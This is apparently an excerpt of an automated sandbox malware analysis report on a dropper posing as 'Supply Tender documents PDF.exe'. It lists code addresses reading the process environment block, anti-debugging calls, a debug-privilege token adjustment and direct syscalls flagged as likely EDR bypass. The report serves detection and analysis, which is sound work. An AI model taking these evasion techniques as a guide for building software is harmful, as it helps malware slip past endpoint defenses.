Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336C5ED mov eax, dword ptr fs:[00000030h]	5_2_0336C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033365D0 mov eax, dword ptr fs:[00000030h]	5_2_033365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336A5D0 mov eax, dword ptr fs:[00000030h]	5_2_0336A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336A5D0 mov eax, dword ptr fs:[00000030h]	5_2_0336A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336E5CF mov eax, dword ptr fs:[00000030h]	5_2_0336E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336E5CF mov eax, dword ptr fs:[00000030h]	5_2_0336E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336A430 mov eax, dword ptr fs:[00000030h]	5_2_0336A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0332E420 mov eax, dword ptr fs:[00000030h]	5_2_0332E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0332E420 mov eax, dword ptr fs:[00000030h]	5_2_0332E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0332E420 mov eax, dword ptr fs:[00000030h]	5_2_0332E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0332C427 mov eax, dword ptr fs:[00000030h]	5_2_0332C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B6420 mov eax, dword ptr fs:[00000030h]	5_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B6420 mov eax, dword ptr fs:[00000030h]	5_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B6420 mov eax, dword ptr fs:[00000030h]	5_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B6420 mov eax, dword ptr fs:[00000030h]	5_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B6420 mov eax, dword ptr fs:[00000030h]	5_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B6420 mov eax, dword ptr fs:[00000030h]	5_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B6420 mov eax, dword ptr fs:[00000030h]	5_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03368402 mov eax, dword ptr fs:[00000030h]	5_2_03368402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03368402 mov eax, dword ptr fs:[00000030h]	5_2_03368402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03368402 mov eax, dword ptr fs:[00000030h]	5_2_03368402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0335A470 mov eax, dword ptr fs:[00000030h]	5_2_0335A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0335A470 mov eax, dword ptr fs:[00000030h]	5_2_0335A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0335A470 mov eax, dword ptr fs:[00000030h]	5_2_0335A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033BC460 mov ecx, dword ptr fs:[00000030h]	5_2_033BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033EA456 mov eax, dword ptr fs:[00000030h]	5_2_033EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0332645D mov eax, dword ptr fs:[00000030h]	5_2_0332645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0335245A mov eax, dword ptr fs:[00000030h]	5_2_0335245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336E443 mov eax, dword ptr fs:[00000030h]	5_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336E443 mov eax, dword ptr fs:[00000030h]	5_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336E443 mov eax, dword ptr fs:[00000030h]	5_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336E443 mov eax, dword ptr fs:[00000030h]	5_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336E443 mov eax, dword ptr fs:[00000030h]	5_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336E443 mov eax, dword ptr fs:[00000030h]	5_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336E443 mov eax, dword ptr fs:[00000030h]	5_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336E443 mov eax, dword ptr fs:[00000030h]	5_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033644B0 mov ecx, dword ptr fs:[00000030h]	5_2_033644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033BA4B0 mov eax, dword ptr fs:[00000030h]	5_2_033BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033364AB mov eax, dword ptr fs:[00000030h]	5_2_033364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033EA49A mov eax, dword ptr fs:[00000030h]	5_2_033EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033304E5 mov ecx, dword ptr fs:[00000030h]	5_2_033304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0335EB20 mov eax, dword ptr fs:[00000030h]	5_2_0335EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0335EB20 mov eax, dword ptr fs:[00000030h]	5_2_0335EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033F8B28 mov eax, dword ptr fs:[00000030h]	5_2_033F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033F8B28 mov eax, dword ptr fs:[00000030h]	5_2_033F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03402B57 mov eax, dword ptr fs:[00000030h]	5_2_03402B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03402B57 mov eax, dword ptr fs:[00000030h]	5_2_03402B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03402B57 mov eax, dword ptr fs:[00000030h]	5_2_03402B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03402B57 mov eax, dword ptr fs:[00000030h]	5_2_03402B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033AEB1D mov eax, dword ptr fs:[00000030h]	5_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033AEB1D mov eax, dword ptr fs:[00000030h]	5_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033AEB1D mov eax, dword ptr fs:[00000030h]	5_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033AEB1D mov eax, dword ptr fs:[00000030h]	5_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033AEB1D mov eax, dword ptr fs:[00000030h]	5_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033AEB1D mov eax, dword ptr fs:[00000030h]	5_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033AEB1D mov eax, dword ptr fs:[00000030h]	5_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033AEB1D mov eax, dword ptr fs:[00000030h]	5_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033AEB1D mov eax, dword ptr fs:[00000030h]	5_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03404B00 mov eax, dword ptr fs:[00000030h]	5_2_03404B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0332CB7E mov eax, dword ptr fs:[00000030h]	5_2_0332CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03328B50 mov eax, dword ptr fs:[00000030h]	5_2_03328B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033DEB50 mov eax, dword ptr fs:[00000030h]	5_2_033DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033E4B4B mov eax, dword ptr fs:[00000030h]	5_2_033E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033E4B4B mov eax, dword ptr fs:[00000030h]	5_2_033E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033C6B40 mov eax, dword ptr fs:[00000030h]	5_2_033C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033C6B40 mov eax, dword ptr fs:[00000030h]	5_2_033C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033FAB40 mov eax, dword ptr fs:[00000030h]	5_2_033FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033D8B42 mov eax, dword ptr fs:[00000030h]	5_2_033D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03340BBE mov eax, dword ptr fs:[00000030h]	5_2_03340BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03340BBE mov eax, dword ptr fs:[00000030h]	5_2_03340BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033E4BB0 mov eax, dword ptr fs:[00000030h]	5_2_033E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033E4BB0 mov eax, dword ptr fs:[00000030h]	5_2_033E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03338BF0 mov eax, dword ptr fs:[00000030h]	5_2_03338BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03338BF0 mov eax, dword ptr fs:[00000030h]	5_2_03338BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03338BF0 mov eax, dword ptr fs:[00000030h]	5_2_03338BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0335EBFC mov eax, dword ptr fs:[00000030h]	5_2_0335EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033BCBF0 mov eax, dword ptr fs:[00000030h]	5_2_033BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033DEBD0 mov eax, dword ptr fs:[00000030h]	5_2_033DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03350BCB mov eax, dword ptr fs:[00000030h]	5_2_03350BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03350BCB mov eax, dword ptr fs:[00000030h]	5_2_03350BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03350BCB mov eax, dword ptr fs:[00000030h]	5_2_03350BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03330BCD mov eax, dword ptr fs:[00000030h]	5_2_03330BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03330BCD mov eax, dword ptr fs:[00000030h]	5_2_03330BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03330BCD mov eax, dword ptr fs:[00000030h]	5_2_03330BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03354A35 mov eax, dword ptr fs:[00000030h]	5_2_03354A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03354A35 mov eax, dword ptr fs:[00000030h]	5_2_03354A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336CA38 mov eax, dword ptr fs:[00000030h]	5_2_0336CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336CA24 mov eax, dword ptr fs:[00000030h]	5_2_0336CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0335EA2E mov eax, dword ptr fs:[00000030h]	5_2_0335EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033BCA11 mov eax, dword ptr fs:[00000030h]	5_2_033BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033ACA72 mov eax, dword ptr fs:[00000030h]	5_2_033ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033ACA72 mov eax, dword ptr fs:[00000030h]	5_2_033ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336CA6F mov eax, dword ptr fs:[00000030h]	5_2_0336CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336CA6F mov eax, dword ptr fs:[00000030h]	5_2_0336CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336CA6F mov eax, dword ptr fs:[00000030h]	5_2_0336CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033DEA60 mov eax, dword ptr fs:[00000030h]	5_2_033DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03336A50 mov eax, dword ptr fs:[00000030h]	5_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03336A50 mov eax, dword ptr fs:[00000030h]	5_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03336A50 mov eax, dword ptr fs:[00000030h]	5_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03336A50 mov eax, dword ptr fs:[00000030h]	5_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03336A50 mov eax, dword ptr fs:[00000030h]	5_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03336A50 mov eax, dword ptr fs:[00000030h]	5_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03336A50 mov eax, dword ptr fs:[00000030h]	5_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03340A5B mov eax, dword ptr fs:[00000030h]	5_2_03340A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03340A5B mov eax, dword ptr fs:[00000030h]	5_2_03340A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03338AA0 mov eax, dword ptr fs:[00000030h]	5_2_03338AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03338AA0 mov eax, dword ptr fs:[00000030h]	5_2_03338AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03386AA4 mov eax, dword ptr fs:[00000030h]	5_2_03386AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03368A90 mov edx, dword ptr fs:[00000030h]	5_2_03368A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333EA80 mov eax, dword ptr fs:[00000030h]	5_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333EA80 mov eax, dword ptr fs:[00000030h]	5_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333EA80 mov eax, dword ptr fs:[00000030h]	5_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333EA80 mov eax, dword ptr fs:[00000030h]	5_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333EA80 mov eax, dword ptr fs:[00000030h]	5_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333EA80 mov eax, dword ptr fs:[00000030h]	5_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333EA80 mov eax, dword ptr fs:[00000030h]	5_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333EA80 mov eax, dword ptr fs:[00000030h]	5_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333EA80 mov eax, dword ptr fs:[00000030h]	5_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03404A80 mov eax, dword ptr fs:[00000030h]	5_2_03404A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336AAEE mov eax, dword ptr fs:[00000030h]	5_2_0336AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336AAEE mov eax, dword ptr fs:[00000030h]	5_2_0336AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03330AD0 mov eax, dword ptr fs:[00000030h]	5_2_03330AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03364AD0 mov eax, dword ptr fs:[00000030h]	5_2_03364AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03364AD0 mov eax, dword ptr fs:[00000030h]	5_2_03364AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03386ACC mov eax, dword ptr fs:[00000030h]	5_2_03386ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03386ACC mov eax, dword ptr fs:[00000030h]	5_2_03386ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03386ACC mov eax, dword ptr fs:[00000030h]	5_2_03386ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03404940 mov eax, dword ptr fs:[00000030h]	5_2_03404940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B892A mov eax, dword ptr fs:[00000030h]	5_2_033B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033C892B mov eax, dword ptr fs:[00000030h]	5_2_033C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033BC912 mov eax, dword ptr fs:[00000030h]	5_2_033BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03328918 mov eax, dword ptr fs:[00000030h]	5_2_03328918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03328918 mov eax, dword ptr fs:[00000030h]	5_2_03328918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033AE908 mov eax, dword ptr fs:[00000030h]	5_2_033AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033AE908 mov eax, dword ptr fs:[00000030h]	5_2_033AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033D4978 mov eax, dword ptr fs:[00000030h]	5_2_033D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033D4978 mov eax, dword ptr fs:[00000030h]	5_2_033D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033BC97C mov eax, dword ptr fs:[00000030h]	5_2_033BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03356962 mov eax, dword ptr fs:[00000030h]	5_2_03356962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03356962 mov eax, dword ptr fs:[00000030h]	5_2_03356962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03356962 mov eax, dword ptr fs:[00000030h]	5_2_03356962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0337096E mov eax, dword ptr fs:[00000030h]	5_2_0337096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0337096E mov edx, dword ptr fs:[00000030h]	5_2_0337096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0337096E mov eax, dword ptr fs:[00000030h]	5_2_0337096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B0946 mov eax, dword ptr fs:[00000030h]	5_2_033B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B89B3 mov esi, dword ptr fs:[00000030h]	5_2_033B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B89B3 mov eax, dword ptr fs:[00000030h]	5_2_033B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B89B3 mov eax, dword ptr fs:[00000030h]	5_2_033B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033429A0 mov eax, dword ptr fs:[00000030h]	5_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033429A0 mov eax, dword ptr fs:[00000030h]	5_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033429A0 mov eax, dword ptr fs:[00000030h]	5_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033429A0 mov eax, dword ptr fs:[00000030h]	5_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033429A0 mov eax, dword ptr fs:[00000030h]	5_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033429A0 mov eax, dword ptr fs:[00000030h]	5_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033429A0 mov eax, dword ptr fs:[00000030h]	5_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033429A0 mov eax, dword ptr fs:[00000030h]	5_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033429A0 mov eax, dword ptr fs:[00000030h]	5_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033429A0 mov eax, dword ptr fs:[00000030h]	5_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033429A0 mov eax, dword ptr fs:[00000030h]	5_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033429A0 mov eax, dword ptr fs:[00000030h]	5_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033429A0 mov eax, dword ptr fs:[00000030h]	5_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033309AD mov eax, dword ptr fs:[00000030h]	5_2_033309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033309AD mov eax, dword ptr fs:[00000030h]	5_2_033309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033629F9 mov eax, dword ptr fs:[00000030h]	5_2_033629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033629F9 mov eax, dword ptr fs:[00000030h]	5_2_033629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033BE9E0 mov eax, dword ptr fs:[00000030h]	5_2_033BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	5_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	5_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	5_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	5_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	5_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	5_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033649D0 mov eax, dword ptr fs:[00000030h]	5_2_033649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033FA9D3 mov eax, dword ptr fs:[00000030h]	5_2_033FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033C69C0 mov eax, dword ptr fs:[00000030h]	5_2_033C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03352835 mov eax, dword ptr fs:[00000030h]	5_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03352835 mov eax, dword ptr fs:[00000030h]	5_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03352835 mov eax, dword ptr fs:[00000030h]	5_2_03352835

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_004580A9

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0042A155
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_0042A124 SetUnhandledExceptionFilter,	0_2_0042A124
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F9420B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_02F9420B
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F908F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_02F908F1
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Code function: 3_2_00AA08F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00AA08F1
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Code function: 3_2_00AA420B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00AA420B

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtOpenKeyEx: Indirect: 0x140077B9B	Jump to behavior
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtCreateFile: Direct from: 0x77752FEC
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtOpenFile: Direct from: 0x77752DCC
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtSetInformationThread: Direct from: 0x777463F9
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtQueryInformationToken: Direct from: 0x77752CAC
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtQueryValueKey: Indirect: 0x140077C9F	Jump to behavior
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtTerminateThread: Direct from: 0x77752FCC
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtProtectVirtualMemory: Direct from: 0x77752F9C
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtSetInformationProcess: Direct from: 0x77752C5C
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtNotifyChangeKey: Direct from: 0x77753C2C
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtOpenKeyEx: Direct from: 0x77752B9C
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtClose: Indirect: 0x140077E81
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtOpenSection: Direct from: 0x77752E0C
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtTerminateThread: Direct from: 0x77747B2E
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtAllocateVirtualMemory: Direct from: 0x777548EC
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtQueryVolumeInformationFile: Direct from: 0x77752F2C
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtQuerySystemInformation: Direct from: 0x777548CC
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtAllocateVirtualMemory: Direct from: 0x77752BEC
